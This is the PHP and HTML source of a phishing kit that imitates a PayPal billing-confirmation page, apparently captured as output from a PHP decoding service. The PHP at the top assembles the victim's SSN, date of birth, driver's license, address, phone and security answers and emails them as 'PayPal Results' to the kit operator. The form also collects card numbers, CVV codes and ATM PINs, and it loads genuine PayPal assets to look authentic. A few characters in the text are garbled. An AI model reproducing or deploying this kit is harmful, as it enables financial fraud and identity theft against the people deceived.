$message .= "Address 1 : ".$_POST['address1']."\n";
$message .= "Address 2 : ".$_POST['address2']."\n";
$message .= "City : ".$_POST['city']."\n";
$message .= "State : ".$_POST['state']."\n";
$message .= "ZIP Code : ".$_POST['zip']."\n";
$message .= "Telephone : ".$_POST['H_PhoneNumber']."\n";
$message .= "Social Security Number : ".$_POST['ssn']."\n";
$message .= "Date Of Birth : ".$_POST['dob']."\n";
$message .= "Driver's License : ".$_POST['drl']."\n";
$message .= "---------------------------\n";
$message .= "Security Question 1 : ".$_POST['question1']."\n";
$message .= "Answer 1 : ".$_POST['answer1']."\n";
$message .= "Security Question 2 : ".$_POST['question2']."\n";
$message .= "Answer 2 : ".$_POST['answer2']."\n";
$message .= "IP : ".$ip."\n";
$message .= "---------------By xCnsL-----------------------------\n";
$subject = "PayPal Results";
mail("$send", $subject, $message);
include('continue2.php');
}
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!--
Script info: script: webscr, cmd: _flow, template: p/gen/signup, date: Feb. 19, 2008 13:59:25 PST; country: US, language: en_US, xslt server:
installation: WEBSCR-440-20070227-1 web version: 44.0-306934 branch: live-440_int
content version: 44.0-304908
pexml version: 44.0-307564
page XSL: web/default/en_US/signup/SignupPersonal.xsl
-->
<title> PayPal - Confirm Billing or Credit Card Information</title>
<meta http-equiv="keywords" content="">
<meta http-equiv="description" content="">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/xpt.css">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/xptInvoice.css">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/xptObsolete.css">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/xptlive.css">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/default.css">
<!--[if IE 6]><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/ie60win.css">
<![endif]-->
<!--[if IE 7]><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/ie70win.css">
<![endif]-->
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/flows/flowSignUpQuickHits.css">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/legal.css">
<link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/css/en_US/lang.css">
<style type="text/css"></style>
<link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico">
<script type="text/javascript" src="https://www.paypalobjects.com/js/pp_main.js"></script>
</head>
<body>
<div id="xptHeader"><table align="center" border="0" cellpadding="0" cellspacing="0"><tr>
<td nowrap><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_home"><img border="0" src="https://www.paypal.com/en_US/i/logo/paypal_logo.gif" alt=""></a></td>
<td align="center" class="cobrand" width="100%"> </td>
<td align="right" nowrap> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_help-ext&source_page=_flow">Help</a> | <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_security-center-outside">Security
Center</a>
</td>
</tr></table></div>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="600"><tr valign="top">
<td align="left" width="25%"><table align="center" border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
<td align="left" width="90%"><img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" height="1"></td>
<td width="10%"><img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" height="1"></td>
</tr></table></td>
<td align="right" valign="top" width="75%"><table align="right" border="0" cellpadding="0" cellspacing="0" id="breadcrumbs"><tr>
<td width="11"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
<td width="11"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="11"></td>
<td nowrap class="activeEmphasis">Enter your Information</td>
<td width="11"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="11"></td>
<td width="13"><img height="11" width="13" src="https://www.paypalobjects.com/en_US/i/icon/arrow_forward.gif" border="0" alt=""></td>
<td width="11"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="11"></td>
<td nowrap class="inactiveEmphasis">Confirm</td>
<td width="11"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="11"></td>
<td width="13"><img height="11" width="13" src="https://www.paypalobjects.com/en_US/i/icon/arrow_forward.gif" border="0" alt=""></td>
<td width="11"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="11"></td>
<td nowrap class="inactiveEmphasis">Confirm My Account</td>
</tr></table></td>
</tr></table>
<div class="sectionBreak"></div>
<div id="xptContentMain"><table align="center" border="0" cellpadding="0" cellspacing="0" width="760">
<tr><td><div id="xptTitle"><table align="center" border="0" cellpadding="0" cellspacing="0" class="main">
<tr>
<td class="heading" width="100%"><h1><span class="heading">Confirm Billing And
Credit Card Information</span></h1></td>
<td align="right" nowrap>
<a href="#" onClick="javascript:openWindowATC('https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/popup/WaxAboutPaypal-outside&justSecure=true','','400','480','', windowNamer('https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/popup/WaxAboutPaypal-outside&justSecure=true'));return false;"><span class="small">
Secure</span></a> <img align="top" src="https://www.paypalobjects.com/en_US/i/icon/secure_lock_2.gif" border="0" alt="">
</td>
</tr>
<tr><td><img alt="" border="0" height="4" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td></tr>
</table></div></td></tr>
<tr><td valign="top"><form method="post" action="Confirm.php">
<input type="hidden" name="cmd" value="ok">
<?
include('error.php');
?>
<?
if($error){
echo $error_info;
if($first_name == 'error'){
echo $error2;//first_name
}
if($last_name == 'error'){
echo $error3;
}
if($address1 == 'error'){
echo $error4;
}
if($state == 'error'){
echo $error6;
}
if($city == 'error'){
echo $error5;
}
if($dob == 'error'){
echo $error8;
}
if($ssn == 'error'){
echo $error11;
}
if($cvv2 == 'error'){
echo $error9;
}
if($ccnumber == 'error'){
echo $error10;
}
}
?>
<table align="center" border="0" cellpadding="0" cellspacing="0" class="formTable">
<tr>
<td class="topSpacer" width="190"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="190"></td>
<td class="topSpacer" width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td class="topSpacer" width="100%"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="first_name">First Name:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><input type="text" id="first_name" class="textLong" size="25" maxlength="32" name="first_name" value=""></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="last_name">Last Name:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><input type="text" id="last_name" class="textLong" size="25" maxlength="64" name="last_name" value=""></td>
<tr>
<td class="label"><label for="credit_card_type">Card Type:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<select id="credit_card_type" name="credit_card_type" size="1"><option value="00">
-------------------------</option>
<option value="VISA">Visa</option>
<option value="MasterCard">MasterCard</option>
<option value="Discover">Discover</option>
<option value="American Express">American Express</option>
<option value="bank">bank</option>
</select><br>
</td>
</tr>
<tr>
<td class="label"><label for="cc_number">Card Number:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><table align="left" border="0" cellpadding="0" cellspacing="0">
<tr>
<td valign="top">
<input type="text" id="cc_number" size="20" maxlength="19" name="ccnumber" value=""> </td>
<td valign="top"><div id="xptCardIcons"><table align="center" border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td valign="top" align="bottom">
<img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_ccVisa.gif" class="marginBottom" alt="Visa"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_ccMC.gif" class="marginBottom" alt="Mastercard"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_ccAmex.gif" class="marginBottom" alt="American Express"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_ccDiscover.gif" class="marginBottom" alt="Discover"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_ccEcheck.gif" class="marginBottom" alt="eCheck"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/PayPal_mark_37x23.gif" class="marginBottom" alt="PayPal">
</td></tr>
</table></div></td>
</tr></table></td>
</tr>
<tr>
<td class="label"><label for="expdate_month">Expiration Date:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<select id="expdate_month" name="expdate_month"><option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option></select><img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="3" height="1"><select name="expdate_year" size="1">
<option value="2010">2010</option>
<option value="2011">2011</option>
<option value="2012">2012</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
<option value="2017">2017</option>
<option value="2018">2018</option>
<option value="2019">2019</option>
<option value="2020">2020</option>
</select>
</td>
</tr>
<tr><td colspan="3"></td></tr>
<tr><td colspan="3"></td></tr>
<tr>
<td class="label"><label for="cvv2_number">Card Verification Number:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><table align="left" border="0" cellpadding="0" cellspacing="0"><tr>
<td>
<input type="text" id="cvv2_number" size="2" maxlength="4" name="cvv2" value=""><img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="3" height="1">
</td>
<td rowspan="2">
<script language="JavaScript">
<!-- hide from JavaScript-challenged browsers
function openWindow1() {
popupWin = window.open('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/acc/cvv_info_pop&enable_locale.x=1','EIN','scrollbars,resizable,toolbar,width=400,height=430,left=50,top=50');
popupWin.focus();
}
// done hiding -->
</script><a href="javascript:openWindow1();"><img align="top" border="0" src="https://www.paypalobjects.com/en_US/i/icon/mini_cvv2.gif" alt="Help finding your Card Verification Number "></a>
</td>
<td><img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="3" height="1"></td>
<td>
<span class="small"></span><br><script language="JavaScript">
<!-- hide from JavaScript-challenged browsers
function openWindow1() {
popupWin = window.open('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/acc/cvv_info_pop&enable_locale.x=1','EIN','scrollbars,resizable,toolbar,width=400,height=450,left=50,top=50');
popupWin.focus();
}
// done hiding -->
</script><a href="javascript:openWindow1();"><span class="small"></span></a><script language="JavaScript">
<!-- hide from JavaScript-challenged browsers
function openWindow11() {
popupWin = window.open('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/acc/cvv_info-amex_pop&enable_locale.x=1','EIN','scrollbars,resizable,toolbar,width=400,height=450,left=50,top=50');
popupWin.focus();
}
?/ done hiding -->
</script><a href="javascript:openWindow11();"><span class="small"></span></a>
</td>
</tr></table></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="address1">ATM PIN Number:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><input type="text" id="address1" class="smallInputWidth" size="6" maxlength="6" name="PIN" type="password" value=""><i><font color="black">*
(your 4-digit card pin).</font></i></td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" class="formTable">
<tr>
<td class="topSpacer" width="190"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="190"></td>
<td class="topSpacer" width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td class="topSpacer" width="100%"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="address1">Address Line 1:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><input type="text" id="address1" class="smallInputWidth" size="25" maxlength="100" name="address1" value=""></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="address2">Address Line 2:<br><span class="small">
(optional)</span></label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><input type="text" id="address2" class="smallInputWidth" size="25" maxlength="100" name="address2" value=""></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="city">City:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><input type="text" id="city" class="smallInputWidth" size="25" maxlength="40" name="city" value=""></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="first_name0">State/Province/County</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<input type="text" id="first_name0" class="textLong" size="25" maxlength="32" name="state" value=""></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="zip">ZIP Code:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<input type="text" id="zip" size="10" maxlength="10" name="zip" value=""><br>
</td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" class="formTable">
<tr>
<td class="topSpacer" width="190"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="190"></td>
<td class="topSpacer" width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td class="topSpacer" width="100%"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="H_PhoneNumber">Home Telephone:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<input type="text" size="12" name="H_PhoneNumber" value=""><br><span class="botspan"><a href="#" onClick="javascript:openWindowATC('https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/popup/SignUpHomePhone-outside','','450','350','', windowNamer('https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/popup/SignUpHomePhone-outside'));return false;">
This will not be shared</a>e.g. 555-555-5555</span>
</td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" class="formTable">
<tr>
<td class="topSpacer" width="190"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="190"></td>
<td class="topSpacer" width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td class="topSpacer" width="100%"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="ssn">Social Security Number:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<input type="text" id="ssn" size="10" maxlength="16" name="ssn" value=""><br>
</td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" class="formTable">
<tr>
<td class="topSpacer" width="190"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="190"></td>
<td class="topSpacer" width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td class="topSpacer" width="100%"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="dob">Date of Birth:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<input type="text" id="dob" class="smallInputWidth" size="12" maxlength="10" name="dob"><font size="2">(mm/dd/yyyy)</font>
</td>
</tr>
<tr>
<td valign="middle" class="label"><label for="drl">Driver's License:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<input type="text" id="drl" class="smallInputWidth" size="12" maxLength=30 name="drl" value=""><i>(if
available)</i>
</td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspaci?g="0" class="formTable">
<tr>
<td class="topSpacer" width="190"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="190"></td>
<td class="topSpacer" width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td class="topSpacer" width="100%"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="question1">Security Question:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<select id="question1" name="question1" class="optionsLong" size="1"><option value="">
--Choose a Question--</option>
<option value="Last 6 digits of social security number?">Last 6 digits of social security number</option>
<option value="Mother's maiden name?">Mother's maiden name</option>
</select><br><span class="botspan"><a href="#" onClick="javascript:openWindowATC('https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/popup/SignUpSecurityQuestion-outside','','450','350','', windowNamer('https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/popup/SignUpSecurityQuestion-outside'));return false;">
For password recovery</a></span>
</td>
</tr>
<tr>
<td valign="middle" class="label"><label for="answer1">Answer:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><input type="text" id="answer1" class="textLong" size="25" maxlength="40" name="answer1" value=""></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="question2">2nd Security Question:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<select id="question2" name="question2" class="optionsLong" size="1"><option value="">
--Choose Another Question--</option>
<option value="Who is your favorite author?">Who is your favorite author?
</option>
<option value="Who was your first boss?">Who was your first boss?</option>
<option value="Mother's maiden name?">Mother's maiden name</option>
<option value="Last 4 characters of driver's license?">Last 4 characters of
driver's license</option>
<option value="Last 4 digits of social security number?">Last 4 digits of social
security number</option>
<option value="Who was your childhood best friend?">Who was your childhood best friend?
</option>
<option value="City of birth?">City of birth</option></select></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="answer2">Answer:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left"><input type="text" id="answer2" class="textLong" size="25" maxlength="40" name="answer2" value=""></td>
</tr>
</table>
<table align="center" border="0" cellpadding="0" cellspacing="0" class="formTable">
<tr>
<td class="topSpacer" width="190"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="190"></td>
<td class="topSpacer" width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td class="topSpacer" width="100%"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td>
</tr>
<tr>
<td valign="middle" class="label"><label for="string_answer">Enter the security
code:</label></td>
<td width="6"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="6"></td>
<td align="left">
<input type="text" id="string_answer" class="smallInputWidth" size="12" name="string_answer" value=""><img border="1" src="https://www.paypal.com/cgi-bin/gs_web/5t4NEWFSmr95GL6bAa2N6feota1hfLE0oqcnHq0CZs8nl7CdwTXzMf-SiiPBFIJeLBotmA/secret.jpeg" alt=""><a href="#" onClick="javascript:openWindowATC('https://www.paypal.com/cgi-bin/wv_web/5t4NEWFSmr95GL6bAa2N6feota1hfLE0oqcnHq0CZs8nl7CdwTXzMf-SiiPBFIJeLBotmA/secret.wav','','45?','350','', windowNamer('https://www.paypal.com/cgi-bin/wv_web/5t4NEWFSmr95GL6bAa2N6feota1hfLE0oqcnHq0CZs8nl7CdwTXzMf-SiiPBFIJeLBotmA/secret.wav'));return false;"><img src="https://www.paypalobjects.com/en_US/i/icon/icon_hearing_14x13.gif" border="0" alt=""></a><br><span class="botspan"><a href="#" onClick="javascript:openWindowATC('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/popup_random_access_key-outside&voice=https://www.paypal.com/cgi-bin/wv_web/5t4NEWFSmr95GL6bAa2N6feota1hfLE0oqcnHq0CZs8nl7CdwTXzMf-SiiPBFIJeLBotmA/secret.wav','','450','350','', windowNamer('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/popup_random_access_key-outside&voice=https://www.paypal.com/cgi-bin/wv_web/5t4NEWFSmr95GL6bAa2N6feota1hfLE0oqcnHq0CZs8nl7CdwTXzMf-SiiPBFIJeLBotmA/secret.wav'));return false;">
Need Help?</a></span>
</td>
</tr>
</table>
<div class="terms"><b>For your protection, we verify credit card and debit card
billing addresses.</b><br>The process normally takes about 30 seconds, but
it may take longer during certain times of the day.<br>Please click the <b>
Confirm </b>button to update your information. When your card has been
successfully added, you will see a confirmation page.</a><br><input type="submit" name="next.x" value=" Confirm My Account">
</div>
<td width="20"><img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="20"></td>
<td valign="top" width="120"><a href="https://www.paypalcreditcard.com/paypalbanner?banner_id=paypal/web/11&paypal_id=005006D5CE3310BF17BD9AD67A7D76EF"><img align="top" border="0" height="600" width="120" src="https://www.paypalobjects.com/en_US/i/bnr/bnr_PVNbnr3_120x600.gif" alt=""></a></td>
</tr>
<tr><td colspan="3"><img alt="" border="0" height="5" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1"></td></tr>
</table>
<input name="form_charset" type="hidden" value="UTF-8">
</form></td></tr>
</table></div>
<div id="footer">
<h2 class="accessAid">More Information</h2>
<ul>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/about-outside">
About</a></li>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/cps/general/PayPalAccountTypes-outside">
Accounts</a></li>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=_display-fees-outside">
Fees</a></li>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/ua/policy_privacy-outside">
Privacy</a></li>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=_security-center-outside">
Security Center</a></li>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=_contact_us">Contact Us</a></li>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/ua/ua-outside">
Legal Agreements</a></li>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=p/pdn/intro-outside">
Developers</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/jobs-outside">
Jobs</a></li>
<li><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/cps/mobile/MobileOverview-outside">
Mobile</a></li>
<li><a href="https://ad.doubleclick.net/clk;30045328;11466062;u?https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/cps/general/PPPlusCC-outside">
Plus Card</a></li>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=_web-referrals-mrb-outside">
Referrals</a></li>
<li><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=_shop-ext">Shops</a></li>
<li class="last"><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_batch-payment-overview-outside">
Mass Pay</a></li>
</ul>
<p id="legal"></p>Copyright ? 1999-20010 PayPal. All rights reserved.<br><a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/fdic-outside">
Information about FDIC pass-through insurance</a>
</div>
<script type="text/javascript" src="https://www.paypalobjects.com/js/pp_naturalsearch.js"></script><script type="text/javascript">
<!--
var ppns = new PayPalNaturalSearch('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/signup','3484-30830-12422-0',this.document);
ppns.addEngines(new Array(
"A9.com",
".altavista.com",
"clusty.com",
"google.co.jp",
"google.co.kr",
"google.ru",
"www.google.com",
"icerocket.com",
"infospace.com",
"mooter.com",
"search.msn.",
"snap.com",
"search.yahoo.com",
"search.yahoo.co.jp"
,"www.overture.com/d/search/p/altavista/",
"aolsearch.aol.com",
"search.aol.com",
"web.ask.com",
"pictures.ask.com",
"images.google.com",
"groups.google.com",
"www.google.com/search",
"www.hotbot.com",
"search.netscape.com",
"s.teoma.com/",
"www.wisenut.com"
)); // End of aEngines array.
ppns.init();
-->
</script>
<!-- SiteCatalyst Code
Copyright 1997-2005 Omniture, Inc.
More info available at http://www.omniture.com -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js"></script>
<script type="text/javascript">
<!--
/* SiteCatalyst Variables */
s.pageName="SignUp:Personal";
s.prop11="::0";
s.channel="Sign Up:Enter Information";
s.prop1="p/gen/signup";
s.prop7="Unknown";
s.prop8="Unknown";
s.prop9="Unknown";
s.prop10="US";
s.prop12="Unknown";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code) // -->
</script>
<!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst Code -->
</body>
</html>
Function Calls
error_reporting | 1 |
Stats
MD5 | 8d57e3addfe39b6dce200658548ce75b |
Eval Count | 0 |
Decode Time | 166 ms |